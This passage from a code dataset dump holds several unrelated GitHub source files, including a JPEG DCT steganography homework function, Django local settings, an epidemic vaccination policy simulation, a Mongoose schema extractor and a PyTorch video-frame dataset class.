every element is 0)\n    # YOUR CODE HERE\n    \n    k = 0  # position of the next message bit\n\n    # embedding positions after flattening to a 1-D array\n    embed_index = [\n        4 , 5 , 6 , 7 ,\n        11, 12, 13, 14,\n        18, 19, 20, 21,\n        25, 26, 27, 28,\n        32, 33, 34, 35,\n        40, 41, 42,\n        48, 49,\n        56\n    ]\n\n    # cover_pixels.size = 8*8*blocks\n    # split the image into 8x8 blocks\n    for r in range(0,cover_pixels.shape[0] - 8 + 1, 8):\n        for c in range(0,cover_pixels.shape[1] - 8 + 1, 8):\n            block = cover_pixels[r:r+8,c:c+8]\n            # (1) Subtract 128, then compute the DCT coefficients\n            dct = dct2(block - 128)\n            # (2) Compute the quantized DCT coefficients\n            quantized = np.array(np.round(dct / quant_table), dtype=int)\n            # (3) Embed msg bits into the quantized DCT coefficients\n            # Flatten to a 1-D array\n            quantized = quantized.flatten()\n            # Embed msg_bits\n\n            for idx in embed_index:\n                quantized[idx] = ((quantized[idx]>>1<<1) | int(msg_bits[k]))\n                k += 1\n            \n            \n            # (4) Compress the quantized DCT coefficients with Huffman coding\n            # walk the block in zig-zag order and append it to quant_dct_coefs\n            \n            quant_dct_coefs = []\n            for i in constants.zz:\n                quant_dct_coefs.append(quantized[i])\n\n            try:\n                # number of elements of `quant_dct_coefs` from the first element to the last non-zero one\n                length = np.max(np.nonzero(quant_dct_coefs)) + 1\n                huf.encode_block(quant_dct_coefs, length)\n            except:\n                pass\n    \n    \n    # Finish the encoding and append the buffer to jpeg_bytes\n    jpeg_bytes.extend(huf.end_and_get_buffer())\n    jpeg_bytes.extend(struct.pack(\">H\", 0xFFD9)) # EOI marker\n    \n\n    # IV. Write the compressed JPEG down to a file\n    with open(stego_img_file, 'wb') as f:\n        f.write(jpeg_bytes)\n\n    return True\n\n# TEST\nquant_table = np.array([\n    16, 11, 10, 16, 1, 1, 1, 1,\n    12, 12, 14, 1, 1, 1, 1, 55,\n    14, 13, 1, 1, 1, 1, 69, 56,\n    14, 1, 1, 1, 1, 87, 80, 62,\n    1, 1, 1, 1, 68, 109, 103, 77,\n    1, 1, 1, 64, 81, 104, 113, 92,\n    1, 1, 78, 87, 103, 121, 120, 101,\n    1, 92, 95, 98, 112, 100, 103, 99\n]).reshape(8, 8)\n# result = embed('msg2.txt', 'cover.bmp', quant_table, 'stego.jpg')\n# assert result == False\n\n# TEST\nresult = embed('msg.txt', 'cover.bmp', quant_table, 'stego.jpg')\nassert result == True\n\n# assert np.all(np.array(Image.open('stego.jpg')) == np.array(Image.open('correct_stego.jpg')))\n\n\na = np.array(Image.open('stego.jpg'))\nb = np.array(Image.open('correct_stego.jpg'))\n\nwith open('arr.txt','w') as f:\n    for i in range(a.shape[0]):\n        for j in range(a.shape[1]):\n            f.write(str(a[i,j]) + ' ')\n        f.write('\\n')\nwith open('arr2.txt','w') as f:\n    for i in range(b.shape[0]):\n        for j in range(b.shape[1]):\n            f.write(str(b[i,j]) + ' ')\n        f.write('\\n')\n\n\n# print(a)\n# print(b)","repo_name":"trinhvanminh/An-Du-Lieu","sub_path":"Bai Tap Da Nop/BT03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
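The embedding step in the record above clears the least significant bit of each selected quantized DCT coefficient with `(q >> 1 << 1)` and then ORs in the message bit. A tiny standalone numpy sketch of that trick on toy data (not real JPEG state):

```python
import numpy as np

# Set the LSB of chosen coefficients to the message bits, using the same
# (q >> 1 << 1) | bit idiom as the embed() function above.
coeffs = np.array([[5, -3, 2, 0],
                   [4,  1, 0, 0],
                   [2,  0, 0, 0],
                   [0,  0, 0, 0]])
embed_positions = [1, 2, 4, 5]     # indices into the flattened block
bits = [1, 0, 1, 1]

flat = coeffs.flatten()
for pos, bit in zip(embed_positions, bits):
    flat[pos] = (flat[pos] >> 1 << 1) | bit   # clear the LSB, then set it

print(flat[embed_positions])   # [-3  2  5  1] -> LSBs are 1, 0, 1, 1
```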
+{"seq_id":"40247697598","text":"# coding: utf-8\n\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nINSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar', )\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"hacklabr/mapasculturais-openid","sub_path":"iddacultura/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
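A settings dict like the one above can be exercised directly with the standard library: Django feeds `LOGGING` into `logging.config.dictConfig` at startup. A trimmed-down, Django-free version that keeps only the console handler:

```python
import logging
import logging.config

# Stripped to the console handler so it runs outside Django.
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {"simple": {"format": "%(levelname)s %(message)s"}},
    "handlers": {
        "console": {
            "level": "DEBUG",
            "class": "logging.StreamHandler",
            "formatter": "simple",
        }
    },
    "loggers": {"django": {"handlers": ["console"], "level": "INFO"}},
}

logging.config.dictConfig(LOGGING)
logging.getLogger("django").info("configured")   # -> INFO configured
```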
+{"seq_id":"34967534100","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom policies.policy import Policy\nfrom utils.history_utils import TimeSeries\nimport logging\n\nfrom models.agent_based_network_model import STATES\nfrom utils.config_utils import ConfigFile\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef _process_calendar(filename):\n    df = pd.read_csv(filename)\n    return (\n        dict(zip(df[\"T\"], df[\"workers\"].astype(int))),\n        dict(zip(df[\"T\"], df[\"elderly\"].astype(int))),\n    )\n\n\nclass Vaccination(Policy):\n\n    \"\"\"\n    Vaccination Policy.\n    \"\"\"\n\n    def __init__(self, graph, model, config_file=None):\n        super().__init__(graph, model)\n\n        self.first_day = True\n        self.stopped = False\n        self.delay = None\n\n        # -1 .. not vaccinated\n        # >= 0 days from vaccination\n        self.vaccinated = np.full(\n            self.graph.num_nodes, fill_value=-1, dtype=int)\n        self.nodes = np.arange(self.graph.num_nodes)\n        self.days_in_E = np.zeros(self.graph.num_nodes, dtype=int)\n        self.target_for_R = np.zeros(\n            self.graph.num_nodes, dtype=bool)  # auxiliary var\n\n        # statistics\n        self.stat_moved_to_R = TimeSeries(401, dtype=int)\n\n        if config_file:\n            cf = ConfigFile()\n            cf.load(config_file)\n            calendar_filename = cf.section_as_dict(\n                \"CALENDAR\").get(\"calendar_filename\", None)\n            if calendar_filename is None:\n                raise ValueError(\"Missing calendar filename in vaccination policy config file.\")\n            self.workers_calendar, self.elderly_calendar = _process_calendar(\n                calendar_filename)\n            self.delay = cf.section_as_dict(\"CALENDAR\").get(\"delay\", None)\n\n            self.first_shot_coef = cf.section_as_dict(\"EFFECT\")[\"first_shot\"]\n            self.second_shot_coef = cf.section_as_dict(\"EFFECT\")[\"second_shot\"]\n        else:\n            raise ValueError(\"Vaccination policy requires config file.\")\n\n        self.old_to_vaccinate = list(np.argsort(self.graph.nodes_age))\n        # self.index_to_go = len(self.sort_indicies)-1\n\n        worker_id = self.graph.cat_table[\"ecactivity\"].index(\"working\")\n        self.workers_to_vaccinate = list(\n            self.nodes[self.graph.nodes_ecactivity == worker_id])\n        # print(self.workers_to_vaccinate)\n        # exit()\n\n    def first_day_setup(self):\n        pass\n\n    def stop(self):\n        \"\"\" just finish necessary, but do nothing new \"\"\"\n        self.stopped = True\n\n    def move_to_S(self):\n        # take those who are first day E (are E AND are E the first day)\n        nodes_first_E = (self.model.memberships[STATES.E] == 1).ravel()\n        self.days_in_E[nodes_first_E] += 1\n        nodes_first_E = np.logical_and(\n            nodes_first_E,\n            self.days_in_E == 1\n        )\n\n        if nodes_first_E.sum() == 0:\n            return\n\n        # By 14 days after the first shot, the effect is zero (i.e. an\n        # infected individual becomes exposed and later symptomatic or\n        # asymptomatic as if not vaccinated).\n        # Between 14 and 20 days after the first shot, those who are\n        # infected (heading to the E compartment) and are \"intended\" to be\n        # asymptomatic (further go to Ia; it is no harm to assume this\n        # decision is made in forward) become recovered with probability\n        # 0.29 instead of entering the E compartment. Those intended to be\n        # symptomatic (further go to Ip) become recovered with probability\n        # 0.46.\n        # 21 days or more after the first shot, this probability of\n        # \"recovery\" is 0.52 for asymptomatic and 0.6 for symptomatic.\n        # 7 days after the second shot or later, the probability of\n        # \"recovery\" is 0.9 for asymptomatic and 0.92 for symptomatic.\n\n        # divide nodes_first_E to asymptomatic candidates and symptomatic candidates\n        # assert np.all(np.logical_or(\n        #     self.model.state_to_go[nodes_first_E, 0] == STATES.I_n,\n        #     self.model.state_to_go[nodes_first_E, 0] == STATES.I_a\n        # )), \"inconsistent state_to_go\"\n\n        self.target_for_R.fill(0)\n\n        def decide_move_to_R(selected, prob):\n            n = len(selected)\n            print(f\"generating {n} randoms\")\n            if n > 0:\n                r = np.random.rand(n)\n                self.target_for_R[selected] = r < prob\n\n        # 14 - 20 days: 0.29 for A, 0.46 for S\n        # skip those with < 14 days\n\n        # for state, probs in (\n        #     (STATES.I_n, [0.29, 0.52, 0.9]),\n        #     (STATES.I_a, [0.46, 0.6, 0.92])\n        # ):\n        #     nodes_heading_to_state = nodes_first_E.copy()\n        #     nodes_heading_to_state[nodes_first_E] = self.model.state_to_go[nodes_first_E, 0] == state\n        #     node_list = self.nodes[nodes_heading_to_state]\n\n        #     if not(len(node_list) > 0):\n        #         continue\n        #     # skip those who are in first 14 days\n        #     node_list = node_list[self.vaccinated[node_list] >= 14]\n        #     # select 14 - 21\n        #     selected = node_list[self.vaccinated[node_list] < 21]\n        #     decide_move_to_R(selected, probs[0])\n        #     # skip them\n        #     node_list = node_list[self.vaccinated[node_list] >= 21]\n        #     # select < second shot + 7\n        #     selected = node_list[self.vaccinated[node_list] < self.delay + 7]\n        #     decide_move_to_R(selected, probs[1])\n        #     # skip them\n        #     node_list = node_list[self.vaccinated[node_list] >= self.delay + 7]\n        #     decide_move_to_R(node_list, probs[2])\n\n        # first shots\n\n        node_list = self.nodes[nodes_first_E]\n\n        if not(len(node_list) > 0):\n            return\n\n        # those who have only the first shot\n        first_shotters = node_list[\n            np.logical_and(\n                self.vaccinated[node_list] >= 14,\n                self.vaccinated[node_list] < self.delay + 7\n            )]\n        r = np.random.rand(len(first_shotters))\n        go_back = first_shotters[r < self.first_shot_coef]\n        self.target_for_R[go_back] = True\n\n        second_shotters = node_list[self.vaccinated[node_list]\n                                    >= self.delay + 7]\n        r = np.random.rand(len(second_shotters))\n        go_back = second_shotters[r < self.second_shot_coef]\n        self.target_for_R[go_back] = True\n\n        self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n        self.model.move_target_nodes_to_S(self.target_for_R)\n        self.days_in_E[self.target_for_R] = 0\n\n    def process_vaccinated(self):\n        self.move_to_S()\n\n    def run(self):\n\n        super().run()\n\n        # update vaccinated days\n        already_vaccinated = self.vaccinated != -1\n        self.vaccinated[already_vaccinated] += 1\n\n        self.process_vaccinated()\n\n        # update asymptomatic rates - OBSOLETE\n        # I assume the vaccine has no effect during the first week,\n        # 50% after one week, 70% after two weeks, 90% after the second\n        # dose and 95% one more week later.\n\n        # older = self.graph.nodes_age > 65\n        # younger = np.logical_not(older)\n\n        # # update two weeks after first vaccination\n        # selected = self.vaccinated == 14\n        # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.7\n        # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.9\n\n        # # update two weeks after second vaccination\n        # selected = self.vaccinated == self.delay + 14\n        # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.8\n        # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 
0.95\n\n # selected = self.vaccinated == 7\n # self.model.asymptomatic_rate[selected] = 0.5\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[selected] = 0.7\n # selected = self.vaccinated == self.delay\n # self.model.asymptomatic_rate[selected] = 0.9\n # selected = self.vaccinated == self.delay + 7\n # self.model.asymptomatic_rate[selected] = 0.95\n\n logging.debug(f\"asymptomatic rate {self.model.asymptomatic_rate.mean()}\")\n\n if self.model.T in self.elderly_calendar:\n self.vaccinate_old(self.elderly_calendar[self.model.T])\n\n if self.model.T in self.workers_calendar:\n self.vaccinate_workers(self.workers_calendar[self.model.T])\n\n def vaccinate_old(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} elderly.\")\n index = len(self.old_to_vaccinate)\n while num > 0 and index > 0:\n index -= 1\n who = self.old_to_vaccinate[index]\n if self.vaccinated[who] != -1:\n continue\n if self.model.node_detected[who]: # change to active case\n continue\n # dead are not vaccinated\n if self.model.memberships[STATES.D, who, 0] == 1:\n continue\n self.vaccinated[who] = 0\n del self.old_to_vaccinate[index]\n num -= 1\n\n def vaccinate_workers(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} workers.\")\n num_workers = len(self.workers_to_vaccinate)\n if num_workers == 0:\n return\n\n # ids_to_vaccinate = self.workers_to_vaccinate[self.model.node_detected[self.workers_to_vaccinate] == False]\n # if len(ids_to_vaccinate) == 0:\n # logging.warning(\"No more workers to vaccinate.\")\n # exit()\n # return\n # ids_to_vaccinate = ids_to_vaccinate[self.model.memberships[STATES.D, ids_to_vaccinate, 0] != 1]\n\n ids_to_vaccinate = np.logical_and(\n self.model.node_detected[self.workers_to_vaccinate] == False,\n self.model.memberships[STATES.D, self.workers_to_vaccinate, 0] != 1\n ).nonzero()[0]\n\n if len(ids_to_vaccinate) < num:\n logging.info(\"Not enough workers to vaccinate.\")\n num = len(ids_to_vaccinate)\n if num == 0:\n return\n selected_ids = np.random.choice(\n ids_to_vaccinate, size=num, replace=False)\n for index in selected_ids:\n who = self.workers_to_vaccinate[index]\n self.vaccinated[who] = 0\n for index in sorted(selected_ids, reverse=True):\n del self.workers_to_vaccinate[index]\n\n # # get all nodes that are S or Ss and were not vaccinated\n # target_nodes = np.logical_not(\n # self.model.node_detected\n # )\n # target_nodes = np.logical_and(\n # target_nodes[:,0],\n # self.vaccinated == False\n # )\n # print(target_nodes.shape)\n # pool = self.nodes[target_nodes]\n\n # # select X of them to be vaccinated\n # to_vaccinate = np.random.choice(pool, size=self.num_to_vaccinate, replace=False)\n # self.vaccinated[to_vaccinate] = True\n # self.model.asymptomatic_rate[to_vaccinate] = 0.9\n\n # # self.model.move_to_R(to_vaccinate)\n\n def to_df(self):\n index = range(0+self.model.start_day-1, self.model.t +\n self.model.start_day) # -1 + 1\n policy_name = type(self).__name__\n columns = {\n f\"moved_to_R\": self.stat_moved_to_R[:self.model.t+1],\n }\n columns[\"day\"] = np.floor(index).astype(int)\n df = pd.DataFrame(columns, index=index)\n df.index.rename('T', inplace=True)\n return df\n\n\nclass VaccinationToR(Vaccination):\n\n def process_vaccinated(self):\n # # update two weeks after first vaccination\n nodes_in_S = self.nodes[self.model.memberships[STATES.S, :, 0] == 1]\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == 14]\n r = np.random.rand(len(selected))\n to_R = selected[r < 
self.first_shot_coef]\n\n self.target_for_R.fill(0)\n self.target_for_R[to_R] = True\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == self.delay + 7]\n r = np.random.rand(len(selected))\n to_R = selected[r < (self.second_shot_coef - self.first_shot_coef)]\n self.target_for_R[to_R] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_R(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n\nclass VaccinationToA(Vaccination):\n\n def update_asymptomatic_rates(self):\n # # update two weeks after first vaccination\n selected = self.nodes[self.vaccinated == 14]\n srate = 1 - 0.179\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.first_shot_coef)\n\n selected = self.nodes[self.vaccinated == self.delay + 7]\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.second_shot_coef)\n\n def process_vaccinated(self):\n self.update_asymptomatic_rates()\n\n\nclass VaccinationToSA(VaccinationToA):\n\n def process_vaccinated(self):\n self.move_to_S()\n self.update_asymptomatic_rates()\n","repo_name":"epicity-cz/model-m","sub_path":"src/policies/vaccination.py","file_name":"vaccination.py","file_ext":"py","file_size_in_byte":13000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
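The core move in the policy above is a vectorized Bernoulli draw: select the candidate nodes with a boolean mask, draw one uniform sample per candidate, and flag those below the efficacy probability. A small self-contained sketch of that pattern (the numbers are illustrative, not the model's calibrated values):

```python
import numpy as np

# Per-node probabilistic transition, mirroring decide_move_to_R above.
rng = np.random.default_rng(0)

days_since_shot = np.array([0, 5, 14, 15, 20, 21, 30, 40, -1, -1])
first_shot_coef = 0.52                 # illustrative efficacy

candidates = days_since_shot >= 14     # protection window opens at day 14
target_for_R = np.zeros(len(days_since_shot), dtype=bool)
r = rng.random(candidates.sum())       # one uniform draw per candidate
target_for_R[np.flatnonzero(candidates)] = r < first_shot_coef

print(candidates.astype(int))
print(target_for_R.astype(int))        # a random subset of the candidates
```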
+{"seq_id":"28790024420","text":"import json\nimport sqlite3\nimport esprima\nPATH = 'PATHTOSCHEMAFILE'\n\n\ndef give_schema_ast(node):\n    if node.type == \"Program\":\n        return give_schema_ast(node.body[0])\n\n    elif node.type == \"ExpressionStatement\":\n        return give_schema_ast(node.expression)\n\n    elif node.type == \"NewExpression\":\n        if node.callee.name == \"Schema\":\n            return give_schema_ast(node.arguments[0])\n\n    elif node.type == \"CallExpression\":\n        if node.callee.property.name == \"Schema\":\n            return node.arguments[0]\n\n    else:\n        return node\n\n\n\ndef visit_schema(node):\n    if node.type == \"ObjectExpression\":\n        return {name: value for name, value in [visit_schema(prop) for prop in node.properties]}\n\n    elif node.type == \"Property\":\n        return visit_schema(node.key), visit_schema(node.value)\n\n    # leaf literal\n    elif node.type == \"Literal\":\n        return node.value\n\n    elif node.type == \"MemberExpression\":\n        return visit_schema(node.object) + \".\" + visit_schema(node.property)\n\n    # leaf identifier\n    elif node.type == \"Identifier\":\n        return node.name\n\n    # just before leaf, next el should always be leaf\n    elif node.type == \"ArrayExpression\":\n        return [visit_schema(el) for el in node.elements]\n\n    # in case they define a schema inside the schema\n    elif node.type == \"NewExpression\":\n        return visit_schema(node.arguments[0])\n\n\ndef get_schema_dict(file_path, coordinates):\n    \"\"\"\n    Returns the dict corresponding to the schema at the given location\n\n    parameters:\n    -----------\n    file_path: path to the file (str)\n    coordinates: [start_line, start_column, end_line, end_column]\n\n    returns:\n    --------\n    schema_dict: schema corresponding to the dict at the given location\n    \"\"\"\n    start_line, start_column, end_line, end_column = coordinates\n    schema = ''\n    with open(file_path, 'r') as f:\n        for i in range(end_line):\n            if i >= start_line-1:\n                line = f.readline()\n                if i == start_line-1:\n                    line = line[start_column-1:]\n                elif i == end_line-1:\n                    line = line[:end_column]\n                schema += line\n\n            else:\n                f.readline()\n    tree_out = esprima.parseScript(schema)\n    schema_tree = give_schema_ast(tree_out)\n    return visit_schema(schema_tree)\nacc = []\ndef gather_attribute_names(schema_dict):\n    \"\"\"\n    gather attribute names from a specific schema dict\n\n    parameters:\n    -----------\n    schema_dict : dict holding a mongoose schema (dict)\n\n    returns:\n    ---------\n    attributes : list holding all attribute names\n    \"\"\"\n\n    if type(schema_dict) == list:\n        [gather_attribute_names(el) for el in schema_dict]\n    elif type(schema_dict) == dict:\n        for key in schema_dict:\n            if not(key in ['type', 'default', 'enum', 'ref', 'index', 'alias']):\n                acc.append(key)\n            gather_attribute_names(schema_dict[key])\n    # names are accumulated in the module-level `acc` list\n    return acc\n","repo_name":"anoauthor/SCAM_online_appendix_274","sub_path":"codeQL_queries/javascript/python_scripts/extract_mongoose_schema.py","file_name":"extract_mongoose_schema.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
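The visitor above dispatches on `node.type` and skips Mongoose option keys such as `type` and `default`. The same shape of recursive walk works on plain dicts, which makes it easy to test without esprima; a toy version mirroring `gather_attribute_names`:

```python
# Recursive walk over a dict-shaped schema, collecting property names
# while skipping option keys — the gather_attribute_names idea in
# miniature, with no esprima dependency.
OPTION_KEYS = {"type", "default", "enum", "ref", "index", "alias"}

def collect_names(node, acc):
    if isinstance(node, list):
        for el in node:
            collect_names(el, acc)
    elif isinstance(node, dict):
        for key, value in node.items():
            if key not in OPTION_KEYS:
                acc.append(key)
            collect_names(value, acc)
    return acc

schema = {"name": {"type": "String"},
          "tags": [{"label": {"type": "String"}}]}
print(collect_names(schema, []))   # ['name', 'tags', 'label']
```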
+{"seq_id":"6204776345","text":"import os\nimport PIL\nimport json\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom src.utils import get_logger\n\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\ndef random_crop(cur_img):\n    width, height = cur_img.size\n    if width % 2 == 1:\n        width -= 1\n    if height % 2 == 1:\n        height -= 1\n    # random crop\n    if width == height:\n        # already square: keep it as a PIL image so the torchvision\n        # transforms applied afterwards still work\n        return cur_img\n    elif width < height:\n        diff = height - width\n        move = np.random.choice(diff) - diff // 2\n        left, right = 0, width\n        top = (height - width) // 2 + move\n        bottom = (height + width) // 2 + move\n    else:\n        diff = width - height\n        move = np.random.choice(diff) - diff // 2\n        top, bottom = 0, height\n        left = (width - height) // 2 + move\n        right = (width + height) // 2 + move\n\n    cur_img = cur_img.crop((left, top, right, bottom))\n    return cur_img\n\ndef center_crop(img):\n    # center crop\n    w, h = img.size\n    minl = min(h, w)\n    left = (w - minl) / 2\n    right = (w + minl) / 2\n    top = (h - minl) / 2\n    bottom = (h + minl) / 2\n    img = img.crop((left, top, right, bottom))\n    return img\n\n\nclass VideoFramesDataset(Dataset):\n    def __init__(self, datapath, idspath, img_size, num_frames):\n        super().__init__()\n\n        self.img_size = img_size\n        self.json_path = idspath\n        self.frame_path = datapath\n        self.num_frames = num_frames\n\n        self.video_ids = json.load(open(self.json_path, 'r'))\n        self.transform = transforms.Compose([\n            transforms.Resize((img_size, img_size),\n                              interpolation=PIL.Image.BILINEAR),\n            transforms.ToTensor(),\n            # transforms.Normalize(mean=[0.485, 0.456, 0.406],\n            #                      std=[0.229, 0.224, 0.225])\n        ])\n\n        logger = get_logger()\n        logger.info(f\"{len(self.video_ids)} videos from datapath {datapath}, \"\n                    f\"img_size: {img_size}, num_frames: {num_frames}\")\n\n\n    def __len__(self):\n        return len(self.video_ids)\n\n    def skip_sample(self, ind):\n        if ind >= self.__len__() - 1:\n            return self.__getitem__(0)\n        return self.__getitem__(ind + 1)\n\n    def __getitem__(self, index):\n        video_id = self.video_ids[index]\n\n        # randomly select num_frames continuous frames\n        imgs = []\n        cur_path = os.path.join(self.frame_path, video_id)\n        files = sorted(os.listdir(cur_path))\n        if len(files) == self.num_frames:\n            start = 0\n        else:\n            start = np.random.choice(range(len(files) - self.num_frames))\n\n        for file in files[start : start + self.num_frames]:\n            img_path = os.path.join(cur_path, file)\n            img = Image.open(img_path)\n            img = random_crop(img)\n            cur_img = self.transform(img).unsqueeze(0)\n            imgs.append(cur_img)\n\n        # concatenate the frames along the new time axis\n        ret_imgs = torch.cat(imgs, dim=0)\n        return ret_imgs  # [T,C,H,W]\n\n\n# if __name__ == \"__main__\":\n#     ds = VideoFramesDataset(datapath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/frames',\n#                             idspath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/train_frames_ids.json',\n#                             lq_img_size=128, gt_img_size=256)\n#     lq_imgs, gt_imgs = ds[0]\n#     print(lq_imgs.shape)\n#     print(gt_imgs.shape)\n","repo_name":"iva-mzsun/MOSO","sub_path":"MOSO-VQVAE/src/dataset/VideoFramesDataset.py","file_name":"VideoFramesDataset.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"38"}
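The `random_crop` above takes a square window of side `min(w, h)` and jitters it around the center of the longer axis. The same arithmetic in isolation, on a generated image, so the bounds are easy to check:

```python
from PIL import Image
import numpy as np

# Square crop with center jitter, following the random_crop arithmetic
# above (odd-dimension trimming omitted for brevity).
def random_square_crop(img, rng):
    w, h = img.size
    side = min(w, h)
    if w == h:
        return img
    slack = abs(w - h)                       # how far the window can slide
    move = rng.integers(slack) - slack // 2  # jitter around the center
    if w < h:
        top = (h - side) // 2 + move
        return img.crop((0, top, side, top + side))
    left = (w - side) // 2 + move
    return img.crop((left, 0, left + side, side))

rng = np.random.default_rng(0)
img = Image.new("L", (12, 8))
print(random_square_crop(img, rng).size)   # (8, 8)
```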
+{"seq_id":"40951046428","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nimport pymarc\nimport traceback\n\nfrom pymarc.exceptions import RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound\n\nfrom multiprocessing import Pool, Lock\n\n\nrolemapping = {\n \"abr\": \"KürzendeR\",\n \"acp\": \"HerstellerIn von Nachbildungen\",\n \"act\": \"SchauspielerIn\",\n \"adi\": \"Art Director\",\n \"adp\": \"BearbeiterIn\",\n \"aft\": \"VerfasserIn eines Nachworts\",\n \"anl\": \"AnalytikerIn\",\n \"anm\": \"TrickfilmzeichnerIn\",\n \"ann\": \"KommentatorIn\",\n \"ant\": \"BibliographischeR VorgängerIn\",\n \"ape\": \"BerufungsbeklagteR/RevisionsbeklagteR\",\n \"apl\": \"BerufungsklägerIn/RevisionsklägerIn\",\n \"app\": \"AntragstellerIn\",\n \"aqt\": \"AutorIn von Zitaten oder Textabschnitten\",\n \"arc\": \"ArchitektIn\",\n \"ard\": \"künstlerische Leitung\",\n \"arr\": \"ArrangeurIn\",\n \"art\": \"KünstlerIn\",\n \"asg\": \"RechtsnachfolgerIn\",\n \"asn\": \"zugehöriger Name\",\n \"ato\": \"AutographIn\",\n \"att\": \"zugehöriger Name\",\n \"auc\": \"AuktionatorIn\",\n \"aud\": \"AutorIn des Dialogs\",\n \"aui\": \"VerfasserIn eines Geleitwortes\",\n \"aus\": \"DrehbuchautorIn\",\n \"aut\": \"VerfasserIn\",\n \"bdd\": \"BindungsgestalterIn\",\n \"bjd\": \"EinbandgestalterIn\",\n \"bkd\": \"BuchgestalterIn\",\n \"bkp\": \"BuchherstellerIn\",\n \"blw\": \"AutorIn des Klappentextes\",\n \"bnd\": \"BuchbinderIn\",\n \"bpd\": \"GestalterIn des Exlibris\",\n \"brd\": \"Sender\",\n \"brl\": \"BrailleschriftprägerIn\",\n \"bsl\": \"BuchhändlerIn\",\n \"cas\": \"FormgießerIn\",\n \"ccp\": \"konzeptionelle Leitung\",\n \"chr\": \"ChoreografIn\",\n \"clb\": \"MitarbeiterIn\",\n \"cli\": \"KlientIn, AuftraggeberIn\",\n \"cll\": \"KalligrafIn\",\n \"clr\": \"KoloristIn\",\n \"clt\": \"LichtdruckerIn\",\n \"cmm\": \"KommentatorIn\",\n \"cmp\": \"KomponistIn\",\n \"cmt\": \"SchriftsetzerIn\",\n \"cnd\": \"DirigentIn\",\n \"cng\": \"Kameramann/frau\",\n \"cns\": \"ZensorIn\",\n \"coe\": \"BerufungsbeklagteR im streitigen Verfahren\",\n \"col\": \"SammlerIn\",\n \"com\": \"ZusammenstellendeR\",\n \"con\": \"KonservatorIn\",\n \"cor\": \"SammlungskuratorIn\",\n \"cos\": \"AnfechtendeR, bestreitende Partei\",\n \"cot\": \"BerufungsklägerIn im streitigen Verfahren\",\n \"cou\": \"zuständiges Gericht\",\n \"cov\": \"UmschlaggestalterIn\",\n \"cpc\": \"BeansprucherIn des Urheberrechts\",\n \"cpe\": \"BeschwerdeführerIn-BerufungsbeklagteR\",\n \"cph\": \"InhaberIn des Urheberrechts\",\n \"cpl\": \"BeschwerdeführerIn/KlägerIn\",\n \"cpt\": \"KlägerIn/BerufungsklägerIn\",\n \"cre\": \"GeistigeR SchöpferIn\",\n \"crp\": \"KorrespondentIn\",\n \"crr\": \"KorrektorIn\",\n \"crt\": \"GerichtsstenografIn\",\n \"csl\": \"BeraterIn\",\n \"csp\": \"ProjektberaterIn\",\n \"cst\": \"KostümbildnerIn\",\n \"ctb\": \"MitwirkendeR\",\n \"cte\": \"AnfechtungsgegnerIn-BerufungsbeklagteR\",\n \"ctg\": \"KartografIn\",\n \"ctr\": \"VertragspartnerIn\",\n \"cts\": \"AnfechtungsgegnerIn\",\n \"ctt\": \"AnfechtungsgegnerIn-BerufungsklägerIn\",\n \"cur\": \"KuratorIn\",\n \"cwt\": \"KommentatorIn\",\n \"dbp\": \"Erscheinungsort\",\n \"dfd\": \"AngeklagteR/BeklagteR\",\n \"dfe\": \"AngeklagteR/BeklagteR-BerufungsbeklagteR\",\n \"dft\": \"AngeklagteR/BeklagteR-BerufungsklägerIn\",\n \"dgg\": \"Grad-verleihende Institution\",\n \"dgs\": 